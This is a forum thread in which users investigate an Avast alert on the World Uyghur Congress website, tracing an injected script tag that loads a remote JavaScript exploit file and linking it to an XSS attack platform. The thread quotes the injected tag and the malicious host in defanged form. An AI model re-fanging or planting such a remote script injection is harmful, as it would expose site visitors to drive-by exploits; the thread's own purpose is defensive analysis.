World Uyghur Congress web site distributes virus . . .

When I attempted to visit the web site of the World Uyghur Congress a few moments ago, Avast! generated a pop-up window indicating that it had blocked the download of a virus. It would not be surprising if this site were hacked maliciously as an Australian film festival web site was also reported hacked this morning by a protester in China unhappy that the festival is planning to show a documentary film on an exiled Uyghur leader.

Here are the details I encountered:

  1. Virus identified: JS-CVE-2009-1136-A[Expl] (which is an Exploit)
  2. Web address: wXw.uyghurcongress.org/En/home.asp
  3. Malicious file identified by Avast!: m2m.net84.net/cn/document.js

I would appreciate it if others more expert than me could confirm that this site is contaminated, and obtain any further useful infomation. Many thanks.

Hi Bolt,

First, please could you modify the URL to make it inactive (i.e. change www to wXw) to prevent others potentially becoming infected.

Second, this seems to be an injected script that links to an infect javascript file at the site mentioned.
It is within the html and body tags so it is unclear whether it was originally supposed to be there.(first image)

The contents of the js file are suspicious as there is a very long piece of what looks like obfuscated code (second image)

The main point is that this is a genuine detection and is something that needs investigating

Hope this helps,

-Scott-

Although avast didn’t alert on visiting the link to the home.asp page - At the bottom of the home page is a script tag (see image) that tries to run a javascript document for an other site the file you mentioned. So this script tag could have been inserted maliciously.

I tried to get a copy of the document.js file but it is 0KB file size, this may have been why avast doesn’t alert as there ‘currently’ is no content in that file, that could change at any time and the real problem would be why the script tag has been inserted in the first place.

Update: Managed to get a copy of the file from an avast alert and uploaded it to VirusTotal http://www.virustotal.com/analisis/7ee751aac47f5a3dd61e359b71861b1572d75678e03a64291634093250a874b9-1248706214. Only 4 detections, which isn’t unusual given that there are very few even looking for this type of thing much less detect it.

Hi Bolt,

This is the malcode in question:

[EDITED by ME]^^script src="htxtp://m2m.net84.net/cn/document.js"^^/script 

Where you get this:
Title:
HTTP Error 403 Forbidden
URL: hXtp://m2m.net84.net/cn
Redirects: 301 → hXtp://m2m.net84.net/cn/
where I get:

 ^a href="anehta-v0.6.0fixed/" anehta-v0.6.0fixed/^/a></li

And this is at the crux of the malcode, because Description:
Anehta is a PHP/Javascript based platform to make cross site scripting and other web attacks easier, via a specific “attack API”.
Author: axis
Homepage: hXtp://code.google.com/p/anehta/
File Size: 5596731
Last Modified: Nov 25 17:46:32 2008
MD5 Checksum: 5316c6cb785caef595c58e80a97f4ce8

302 → hXtp://error.000webhost.com/forbidden.html

polonus